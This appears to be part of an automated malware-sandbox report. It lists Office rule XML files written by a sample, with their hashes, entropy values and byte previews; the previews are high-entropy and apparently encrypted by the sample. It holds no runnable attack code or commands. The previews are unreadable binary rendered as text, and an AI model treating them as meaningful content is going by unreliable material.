                                                                                                                                                  Entropy (8bit):7.983807055641617
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:lCQ/Lgt9sb2d+V8P9kSu3ZlFnE6LwjpQrfoWf9cSVuTQ71YEB2nCYbzStJcX:lCQ/csSd+OP9rgnnEEy8oQ9cKu8xx2nD
                                                                                                                                                  MD5:828D719DC4922B1FC4289AA2F7CB5EDE
                                                                                                                                                  SHA1:F88A1B2BCD6FB6113E4DE4FD322B1105E88E42A2
                                                                                                                                                  SHA-256:403982E49953656E73D073235F41110BD0C5132DA6ADDA630F5F681C5DD4103E
                                                                                                                                                  SHA-512:9E600D66F19ED2D5B861CE8399F578D5F2A49F38C069EF9F30CE38F317116FDEF2A8CB708D91CC9B1DD1F82FE4C438A224C076868F7E1DFCFDD3EE1039A325E1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml-o.V._..M......47....R.9..:f........|..g....Q.7...._TG...x."-...f....B%.U......x\Od-.jm|<Up.A...,...3.K@=.....8..|...*......u.B.d+...M...w4....XX.e.N.9..#...z..!&....RI.%.7y..SvE..!.w(/F3..".5..,~.>Y...........h.%Y..{.uJE..1M>.WI.{9.&>[.~.]DL.!OI^...D..I...@......u..v.B.K...N......NUn..H5.u....<T}...H.BO.0...CgM....3<.#C......+..Bi.l.$.`.c.Q.g+e+..k..:._.._.?.............L.'Dv......e..+a.../#..$.P@..M..5...6...?...Pz.^..!.=..ta.-VJ....7z..g..)1.....m.. +O&..*Y...i...L~_.0.2....}........I..N$....d.3Cxd6..2.r.&....J[..}..x..>!v....."-;..K.............)....8..GF5..4...[%.@.)..,......@..O....M..}......j...o...n..?i....B..ca(.....`...].y.*k+.:..A5U.T.qm..\.o\.:b..x...L....v....,.'....I.2yk..Z.....;..8...~$n.m....<.l.............+.g..VE.w.o`.?7. .s.O.3c.m.i..]7...._PSSL........SO>...R.v.V.........GIX.C8.@.u.!._..N.Z.(*G}....#x....-..t.....=,~......z.......H{\x.. K&.....t.P.....'-x....,Tw?=..U..2...s...r.^.,.,.>MYK.O)C.........o...L......-

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11464v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.678578743520586
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fEtTLjzNvGoYVa9VVNi50ZSBH/5L0VXTo2bD:qTLjzNOTVaNi6ZSBH/CpHD
                                                                                                                                                  MD5:E5A79C0E4592FB7777DAB20B0173AD86
                                                                                                                                                  SHA1:6B072142C70AE903E3FC42999FACC167F4CABB72
                                                                                                                                                  SHA-256:E53FA7B045B25B2DA134F0D772D59C56AE96AC4916FC04C6A23E1EB74B099D33
                                                                                                                                                  SHA-512:C6CFC0EDE28D3CC5B8691F75BF50C1CE01CAFF2403D61A1120C64711753E0F959D8DF1369849891F4A5ACE7BB0DCB93044CE84DE558E6F195041FD144C771678
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.i...n.....V........!..}Y....~\.. ...us....YG...a..j}....,7,.9R.3..<C..= P.H.4u3.L).$..h..J....V..m..v..n..-....&....7..^\..Z...".f).4.S.N..N..S...g..."*.^;.D...~.....tS..36..9a.*F........N.1......6.J=....Rw.' 7..{$.i.Z.-..u..,dw...GZ%.h .............f.4X...B}..........V..}r.,....>{1b...L..i.p....6..P....P...r...J.....;9..'..m..y..'!.*.J....=E.3QS.c..\......V.......>c*..!yQ.....,....z...A.....aB....#.8.pD1.E..p...Y...{.^..v.8...L..D..L..ER!.../....7....~.e...b....N3m\.Z....=G.....z..7o....BC.[...9S..X.h...u0.......n...@ya.k....B8N...mO./...)w....P.).~.<'l.(0.?p...2EtE.2..../BVu.i...4DX. v.?./.fE.N,.B.....V.?..n:..<0....._....'H...A..+R...J...HA,..$...T..'......_... ;=W.%.Dp.l).. ......7SC.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11498v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):747
                                                                                                                                                  Entropy (8bit):7.689689917606062
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:CCz30lpZr8VAZnRif74j/YvwBhfDwk/gA/xd2rWV1gOpHQXnQISXce5SUdNcii9a:3k3Zr8VAxRiEj/TBT/Px1g24TSseM2bD
                                                                                                                                                  MD5:EDB1D00F859D10BE984FF0FFBB8AB298
                                                                                                                                                  SHA1:AF9C8B1B35182499E70A1D5CAADA25907FAAD04A
                                                                                                                                                  SHA-256:4571FFC07E3A52C475674A4AE51E47B91BBCC1065DB371BC77392B097FCD1B23
                                                                                                                                                  SHA-512:0E5A0AD8D460FE8B23AE202267E0D4A321C8DC18554836FE34C0CB890E63EEA6C4A8D293773F5F7AA1E8FF4372EBEE2032B9B1EC421535E9A78A5557B1D124C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..%J..2..l..IH....J.8C.K;..~v..[.....A...K7.I.T.'.lN@.U.G..DND........'YA...*...My4..\.*9./.~G..c.......f...Y./.*....4...cb+..2..e...........j_l.G;........8.\..M.-..z....%.3.9.-#.hr..cZ.X.->.5..O$.z...Lp...q.c......+..O.#..@a.E...g..$...,..q.....%...lV.h.O.;..T........=c...s....zO[E.!:q...Z...l2`.%...8...3.V.Q.4..b.p...&.!..j.....{Z/{..B...*).l...P.....?..-..*.._[....../......8..t..P.wK..LfX...^.a...t...5..k3..e.r....`......&5.1U.._.y.d. A.u.*..?....A\....a........:.....2...b.....n....@(.........T...KAbY.5..... .E.e..J....(a..&.....5..>.".k&w.,.*...@n.|o..M...T;D..H#....N....Y.!.......3.W>....u..eC..;5...5.......0..=..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11499v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1786
                                                                                                                                                  Entropy (8bit):7.892319672260821
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:3WdWCZ0QZSguQXyc0PFFDsovPAiBAnAYb6sI+rojbD:32v0QZS5FFDBALAYb6sItz
                                                                                                                                                  MD5:886C013B876770BBDFBC86EEE4E7ACC8
                                                                                                                                                  SHA1:1995EBDCFB5BA5BF6CE3F199CBDD250E46BD9A4C
                                                                                                                                                  SHA-256:8F25CB2607CE51505F5C997F3BA0B29A7A1011B19C923BDE0DBAE6715BBB7971
                                                                                                                                                  SHA-512:423A8D8B8C5A40EF34756C2AC0FFC2FE56D0483B7122B51584DB3BD63F504BDBBE1F74DB3F009DEF0C56F97FE62785F4F5BB02646C52ECAFE0443A3CCBA003BB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml%.;.c?.......NA......x...X...kZ...........E.g"..K....[EVt{\.;.......C.6....{.'..U{.t.1..k....."ha1...G.P].*..E......p.z{..]..'L..h*.....^}V...|WF..+2.*........Y..X|*z5;.}.?.JTRr.7..].V+.:.CkV.%5...~.].....V/...qcayI.t.....QPuVp.x..L0...@....q....8...:8..6p+.%.J.=(...HP..[.......@....G.lJ.J..m..I...-..s.Q...!.D#...6.....q.*..J.".,If.9.........z.....~rC....|/.P...pn.^.PR..P.......B`.*R.....4...v...h....+.Y..B..........`3.4).D.../..q...f....L......f.=....CH.cl.?...0.U.i..@...4..C...g]To.....2|.=.=c....8]e.,......vx..Uqxv.B.9.1%?.8;.......L.{.D.g..t....~}.)j.._Xu..<V...O.q..Y.K.R...h..'........u..f......P.2jH....F..T5....Z.%.n..."....[..!S..yl+..........K..vMG.2S.U,e.M'..V.?'....Q...9.t%..x..=....M.8[&.l..|.gWo&...>.=h.r.....x....Wfr*.-..G...S..u..6......_4.-.._.2E.J.m.+.I..../.%.6.pO.....I.I#5.....;.-.'..>.:....]..~w=...,...X..@.b!w..{.r......p.f.4.M..dL..a..O..[qP.fQ'8..P..v...<z.../.s....CqYl.qJ>.i..r..4.9'H.cz...fA].kn.}.+...%

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11500v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):886
                                                                                                                                                  Entropy (8bit):7.7456378880465
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DCo3PAfIr5BLJ2PtHc8YFTePQc7bLQI+Eb2NJ3p2bD:+o/AfItBLgVeWd45CD
                                                                                                                                                  MD5:570A404D4873E4D9367C1AE8154FB027
                                                                                                                                                  SHA1:A2DB227F325ADD31837D7B17FFE7540A66687E57
                                                                                                                                                  SHA-256:B6F111548BC777EEFE3F30230BD33386922F7ABC381BF7525E918625135ADED4
                                                                                                                                                  SHA-512:0558C40DA83DE6DF3AF2CB71B880F0B05C1A42295297F707C706A5C8B62C3D98A7DBCDE2509C88EB1008EEC7E744C29570DA0C4A649FE0F6037D429F4992D4C5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....y.*.q..\..j.b}(..#!......(....<w._.)(nq.\.x..|.vc..c<>.....\..Y.....4.o.).8X..9nDmr...f...id.h<.K4s...^.u.Qdr._H.|.....4.*7.x.Z..[..dR....77]..............wy..$r..U`..@^.U.I..N.d.........V$_...6..i'....r...@.....:.<HJb.....S.o.9..T...N.T...[).UE.1.eGZD..Z......._l...i.g....f.*.....F..mk2Z...!!.A..="..28..<$..i.e.R.y.|....jho.Q]B....tz....4*...?K..E.V.]t.f.aq...N#.}...!....-..A.}...i9o\..[c..Ox....E...!(2....'.....j..W..z...]...4x...^<*...w=...0H.I.k.r3..tR#.....i,.1I....h1.gM.....6."....0..q..L.|."...p....Q.e.....UH].*...R9.8..)...DMh!.Qb.G.U.C....:Q.C..p....oK..:.(.k...#(./...Jq....p..E..|...&2..'..$Qe&a.LP..........#.uSo.(@Fi..K.....p.. ..p..=....2.....3..,.......:.PN..2yCAj..zL}.,)m.......CGhR..g`.........H8<o@.a.N!.>...J{.,...nS...5&|...*.u..A..a......bCmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11502v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1324
                                                                                                                                                  Entropy (8bit):7.842127322765116
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sIFP1WWlFEw5PYIXD9KGdFErq42xcKliLokuOV1ZiVWVtr8AV2bD:rZ7F5TJAOlauOVWOtr8AuD
                                                                                                                                                  MD5:755ED631722B9A10B881AFCED7AFCCFA
                                                                                                                                                  SHA1:C11270F53C8BFABDE3775462C3CE7C29A512855F
                                                                                                                                                  SHA-256:C4C552F81FD02933286DE36E1E8D1258CBE2C1199CA05E73901A126B970ABBA8
                                                                                                                                                  SHA-512:EF7FD9A6190649516D3D63CADE8BD4AA98DA03068D07828FA74BA5E021D5829BB000634DBA02CCD9C04B208E59F6900B405235547601E6FA472A2FC5CCEB6B90
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......M|.y.vl.o9.e.?.E6O.J..f..^.).../^.U..QEs...3.(A_..Y^~2.....Nj.O.q.%.l.X.Z.^ss.c...p.NO)......C+8.1...Ah:....}..=.H.&........`.F.....e."....a.g,.......}......!.......tp....a4.@:J.Jk#.WL/Y.[..~..:...h........i.x>...:.7[1.u..n...b.}.>P.......Xa...'...F.........|......|.....,.~...w!>B"....".7.R.J..g.b}.&.....*.......84.ac.Y`W^...hAI.e..Y?.,..7L^...L...;$...a@.<...J.R.o..#.bg._..k..Q5...a...%`..v....w_.$..S.P.]z.C..m.....}.....X.............v..E.-..p.hqP$~..G%rE..W......4w..P.-...6.D7.g.Y.?..1].#9QPu..M.*.......,v.^...5.Je.=...]...%.N..-c[".c....G.....R..........;..1...#Z.%.d.....P.......iak.b.<....Z>.]0...7.%=5..~.8..=.Ky....j....P.N...d."l.&....T.....U.r@. Z.s...4...a.Q.-h..?\.s..&j..*X.J0....?...\......e....\Jw..0............e...._.?x....`[..o.xTR..].B.F.9..~'..am..g}8...u.B.S...I.l.......x>C.l.SvVa.L...e....*v'.J-.6.8!kA.......V1.E#NQ!ZQ.a.U..3.vx2.pAn.8...qyt......~.Y..GR:.rtj1..S[Q......[......3.....'.q.....p|2.]..W.% .

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11504v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1435
                                                                                                                                                  Entropy (8bit):7.829054785299187
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:68qDMQF4Q4D2qmcYQagRoJS2mOl0tbABhnma77bew8XAlEvR7OBHdnWnY2bD:lJVDD2q/YDga7atbAWa7HCAlG7sH9WLD
                                                                                                                                                  MD5:32C58A127C2FFA1E0619E7736887CBEE
                                                                                                                                                  SHA1:B5458B55E534E88EBE9F50149E37C2C987E0C2FA
                                                                                                                                                  SHA-256:7A95F2A19DA5B51E3758CD871463A6881C28E837565A2D286E8F3A4526DEB26E
                                                                                                                                                  SHA-512:EF708D9DD2D75FB98FB490E76BC66004D9FCC4D3A22C05D026C5E3C61888887436AB675E93AE775442D386E403D20D2476F21AFA6E56CB8358B7F295CBE3F6B7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmld3.fH..A..aX..;........;...-.j.\....f.\l<...h.p..Bg\ir6j8.}..V/#.......Y.0.;.0...........n6L.\m.(........vFwU.....frxO.}2..</..l{....K.iE....._.....x.[.L.....=.....+=3t.t..0...]?k.IA....#..AW%.7|.0.5..O+'...V.l].....|.mV3`3.0..........`"0{C.Cry.6......bc"|S5Tx..\..nn.6..pb..wx.c*..)'4...#I..2..7y...u..|..G.~..~.4tg.I.s.:F,...:.....OZ....7.{...^.{....*.Y(8.Ah..*.TW......CZ....Z.=c.4..}......$.m..knlM..O|.wu.u>#Qj...O..(.3.....9(.W......Z.....X..z.?\bG.N..q.c..7$~...fP.....6,.7...:.9.%..2b.E.|.P......_....P.L.....A..c..F...Knh.5.B2..7C...|+....8.UtGc".2..U.3..B?....u%./.A.D.1AM.(s9...D(..!".|;.....x.E-...y.l.!..1*6..i.9.Fz.U..`G.C.M.Bx......G......<.....].,......C.......T..M.{s..md....X]|O.....b:.Iy7.....2.S.#j.c..H.....i.N.!..(.....nh^;.`.jx.H.G7.%V].y1`.U...........2..T...&.>.....kc..d...&...U#1....4.1.-u&.}..s0..i[.&'. .(...A..`...w.x...v.._6...P0.t.m...9..M|..VB.`t.}.........1.?..4..a.62....N..k9ji<t.b.....K...1._..[.3.....g^<..2.6.#

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11514v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7119
                                                                                                                                                  Entropy (8bit):7.973476933156573
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:kM2Rp7D+0bvzwrkFYEQfjPZQjyl4L1rTg1NxZpo:Ip7yILyOQfLZgUe
                                                                                                                                                  MD5:025FFC21569F0C41DB7C09CB58243E25
                                                                                                                                                  SHA1:56D5659D27B912AAEF22E2595EA565F4D753E0E3
                                                                                                                                                  SHA-256:74F802B5BB6BCD9FDCE2A19732FFEEB6C422D518A134B4AC0ECF5441F21678A0
                                                                                                                                                  SHA-512:D266B0008D87469BF3723026143240C1E42956AECB2D188EF6A177B992A4E68C01D2B9B0EAE28FF05A5D0E2980241A8003B23FEBCAEEB7EE8460A345CEAEF384
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlD...R..9v..H.. .Q..r.]K..|..p.4kq.)y..u=.i]].Vqx.n.!......`...5..2-\...j..G..x..J._._....I60.rv.1.6..OM.....:y.2......DC. *...J".....C...O.0..._h.0..B.(....f.....o.C6Q2j..w_D.>u..R..7$.....[w(.$5..Y...F....O.....]8P...C.......a.....O...4.C..!..Q...d.e.Z..@.\.$i2I.c.bJ.[..Yyg...R"o.............#....`.l..z....u...Nv.3@.|.U..C{n......Ux..f..i9........."..3....|.J^7G.]..V..91-621..@r.?.....R7...Y`.q....t..O.........|...L.@...=."XO-C9.+.J...j.7s.........=.......s.).."!...P+.T%u.i...G...O.l@..7.P....W..^q6..pG~y.$.d.2...J.X.W."..d.93.oM~wg..w...eF.^9.....j...!...."_..Zl|.V...y..p...j....c.?.../D....h..$..`.S0<...J.r....b}..?.bP.Y.'.%...x.x.....'.+.....a...A.Kv...>H.<..W[....n.P..K.-.9U.Uk..].....c...2..H:. .,+.d.S.h.|....!."...p4.U0IL..P....Y3........V.......S....-i..o.V.p.5....o.l....2e .;L.f...QB..a.0.B.Ne.s...7.i.......GC.r.85D...N.&...PG....!.f.(u......&..S>.............:$...v...@...M/.`..W.j..N-_w.<.U.`7.X..X.]_X..U....."..o9.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11659v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):762
                                                                                                                                                  Entropy (8bit):7.711164525886615
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+qFA+TWZRz0iaQ6GMX3ctCU3z8GRf8KXSR1Ht+bwmFNz1ofpU5hNvj0rfXSUdNcq:+qXTWmC3M8tT4GFFwmFNSfpU5hNvsfCw
                                                                                                                                                  MD5:A692A495BF9CFDE5ED4453EA90C0A124
                                                                                                                                                  SHA1:F4157B2B1CFC2F87AEE0F54AF04877F8BCE021F0
                                                                                                                                                  SHA-256:F520A216C6339D3F6B5E477B718A8ED349267140C3167AE32B5BA3A7C2DFF31C
                                                                                                                                                  SHA-512:3D4FF58C6293D3A78F045BBEE63253731F55E2C1FECD767957AB7137C69898180ABD3169A5251D6E58F86B39F0E6693ACDF441D58A6E7BEAF56891B385A166C8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml^e....@.......(Z....3.I....A./.......U..4.=?s.o...W..&.k....z..D...s.Y=...$.....b..[.?....)...,....d.p..jF^.#.v.RM{..p.!..5.e.C.dcyg.%lZ_....O...{.j..\...x.G.7...QT.n.Gb..(Pc.V..S...By...GI.B.......{|.O..*..k...)3#7q...<.......Z......h../..s.n..zj.x...G}....gN.o...xh.U2.I.l.hO.o.I28...l..}....-.D....kD.e..@;..p...6....HF_.<.T.G.CB.s...*....C.Wj..c..F.j(D........6....[.#&.st.P...m.Z..#......r..S!v....C.etP.Z1..o..e.;..1.B.=....h5..m...f..x.v.]...F\..&...`.>...h........h....f..n.f..j..:..P..m.E5..Wf7...]..A..y..$....a.g..T...qV.oh........X..}....L.B."..ap...s-88.Fg...Kw~.]........C.p.xw...?"Lym.%...u.6Y..w.(.6..).,..x.2...*.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11701v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1463
                                                                                                                                                  Entropy (8bit):7.849111496720984
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:U7WpYxA9A8squulKjehsDLq+ccHOq0vsDzHkdFbpdXr7ZN63VHT2bD:kPAC8jqLdcct04LkddXrT63VgD
                                                                                                                                                  MD5:B9CAE30AAE2AA8DC4CAFC83B06868476
                                                                                                                                                  SHA1:2E565ECBF067269940EC5736CA591779D57C0B40
                                                                                                                                                  SHA-256:7F8655CA45582DCFAF22C9A14755A48507BD844971F0C18C71E56D6098C2DE95
                                                                                                                                                  SHA-512:7CA1A072EE3A9969E670E889E31B8223992285F3CAF79A2B2F58C60ADF2041382E746A5FE6E79BFBEBA758481F8C4C4D2A35AAE90E587693C30125664681B115
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlh.}d.......R..`.bWa.1=/..b2.$.m.bE.I..w.$M..fZ2...:.x...%v..Nb-..f.k.$Y9.7x2R`..fl...7..c...$.-...K.e..$!.c..0.._#.....D.L.nLY&.8....5>.G..;..5....w.9*+......j..\`..AB.....X.*....43.|...._......t.}.....m..9. .V..8..!S...~.I9*..8.X..$.$.Q.%E..7#@.........V..#.H(..b.L"y9.&.......H..R.....E.#..ms.P...._....i.\....W._S.<.I~u k\"Xz{N......&.....f....^.jW)g....$..}?.v>......L...[......&.(.K.....R*.<{q.....|L#F....ag.u{...y.sE..kF`..p.?.-.\.'.!..(.%-...[Y:.Sj...4.....B.r.7&...iG.i.2T..1.q-3.3n....0,...tSY.......#....:X^lFR..qR...:.........B.q.A.\...8$.5I....2.2jo.hZ.iWg..[v..T}.....4..U..B..!Y.R.n.%...d......B"..M.|.....?..!B..o..r/f.....9..O.5.mg..lXX.fyc.y..#-..F..3...4X..KO...5....%.%.}0H.tL/..l.'^...H.jh.......F.gj...y.'P.Rg../.r.:...V9).p..0u.u..d..t.J.76...^Ql~,....D.._V,uk.(..u......-.gt... ...m._..m..(r...W....m.L.,.(>....r..Rb..'W.L.Rfo...bh2...0.]<.R]..mY2.ws..6..E5.99........0.."K..7.&....i.E.;...........!.9+b....}L...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11705v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3505
                                                                                                                                                  Entropy (8bit):7.944276656302753
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:RB+biEptj5wKUhukEa9MSM/RbVVcaFNfviE:PmdFMn/0Jjnb
                                                                                                                                                  MD5:E46C02683BE2961E4CD1FCC1888E8FB7
                                                                                                                                                  SHA1:850743501845BAB260CC8C11583918625936D4CB
                                                                                                                                                  SHA-256:7DCC8A25B4B86B413A660A44B693BA06DACD6AEBA8BFE75909B97C50B786E55B
                                                                                                                                                  SHA-512:533829A9065228B4D0B13C482266654D9CDFD42AFA544F7E2CC9237C43E799BAE45E7D24649EEDDA63914FD41E53B5C44EFAF77AAB1882B9E5554B45A73B4F1A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml#.)+t.yt.........'Y.@B..qb......:..=./..9s..Q...-..(O..-H....../Q...q...<....!.'L.r....X.W.g..'..%...6....S....4..d-.-..a.w.6&./.B*........`\.jd..[..W....y.k....>.t.ypI.._.`..].."..I...@[.@3m.5......l1.Z.}B..>U.J..e.....AiXk(.....i..y(~.#{..k5"R.%@w8..].n..z...u.+.....x..........0gH._>........TB.N..awrH....M'...Z....V..?...9....J:K.....1....9....M?.9...B...:<&.7._.[s?.gae........w~....k0.U.......U..*+.......zC.4qY&24.J.J..E.lysMD..?.8.}......Ig..S....o.../...`...,....v.......J.-[..?.bog..n....3.w.4.1%v.S.....>....&..^..tpf.z..P7(3..=/.o..?.....W.tf^IG.d...t..|fM..+{(..%..I....GS{.Q....K~M...B`..K..$........v.).NO...g*......-u;...e.#......N..f{[X.COg....'e;ak..=...E..]...9.&...$..=.......6rL.E....X:.>xVx.M..As.T.ZDX..........].....N..:.%&...q.WB..j..,...lh...V.....`....7.....P..f..}...M.....S...oo......=..Fg....q..4.V..8....B}.....Vg..m.~s$.j..h.....Q.1...}..~X.......?.I._.(T...s.k..I|$..a..A..'/....r$2...I.VHL..V.v4.TK%...e.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11710v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):965
                                                                                                                                                  Entropy (8bit):7.770561367709913
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wOa4EsY4rxdsciGtgibvyYQ4Y/7fow9N1RenFbrGR72N42bD:wOesY4Vaciwtj5+v9N1ReFbr+KD
                                                                                                                                                  MD5:86AD90D27EA7887115CE04A7D6AFC5BC
                                                                                                                                                  SHA1:0728EC35BABC44737D7FCD33B58B0A010602C413
                                                                                                                                                  SHA-256:68496D97F45F47FE071803BF4969168B1492561AF367521353870B1B921C5C7B
                                                                                                                                                  SHA-512:EB48AE686D71E19B33E2E84AB27BA9C24BF19F14A35113FFB83B213F1EE092A59233DAA170110C50A541E3FF5F4FFDB522856008BEB2112837F4FFC5FE36B10F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.A.....".Kh:.@.A.uV+O.(-.r.{..`>.-EA,h....t...I..y...'.O.B......w..k..G3D.#p...pkM.c#"jEt'X........\.M.2...M..k..._$ER.X.vq....>....Q..nl}U..Q.oF..jO..?.T.0.2.....*.X....F....<'..Q.....S.u9<..2.uwA|.U....C.....ON...b8._.E.U...sb.w.....VTs....c.........{=..<8..qI.;..R'....r..KP...q...6..U..|.`.9."W.......1......yc(..YgQ....E..A..K...:.);...J'.<n0.&xZ;.v.._0.{._...c.V[.....+..]...9.?x.......$..Q/..Z..;...{.,./.*..1L<.m_?.6w.....qA......2m.....+.X.._...j.&[...`....brM[/.../Y.S...C./..D."s..|..D...K........i.F]...w.1P...7+.O.T.[..4'.Y.......]*.Hb.b..:..yF...G....L...!.;q..N.e....H.s....)D..$.........-/d.....C.83. ..N..tr.<{IM-V.;.gD...i.=...ev...q=.y.x.T................}.1.=.LX.......h..-.5s.b....<..*.i...e.H.u.i..V.t.O.,!..Y#...&.~...w..m.....X....e....\i....m..U.OE.B.....@eR...T..p...|.I.w7N.r..f..=..k....-g..z.@....L.1mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11767v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2983
                                                                                                                                                  Entropy (8bit):7.939442474184078
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:reUyRAHbfFIN2TqgX/E8EcSvnXQybv8qsDdr5H2r2JUEIPEbOWbD:reUQ8V/mcS/Qy8/Wr0UEcA
                                                                                                                                                  MD5:132F6941553F425E4FCB89FE5B8DD4B5
                                                                                                                                                  SHA1:D41C34951440BC4FD3E945011B254668913C3F82
                                                                                                                                                  SHA-256:F5B1B79818D6495F9405038D1E74C7E71798595E16782D4440CAA44E347B8F90
                                                                                                                                                  SHA-512:A56BFF8AC6FA92F2542AF2CB0B77D5594555A72D0B7B837DC7FC3EB892CE21F6A61A08EC9FDB1E43B72A2DC62B79F02F111C5C830379FB6F3B1B16E2F3BE903A
                                                                                                                                                  Malicious:false
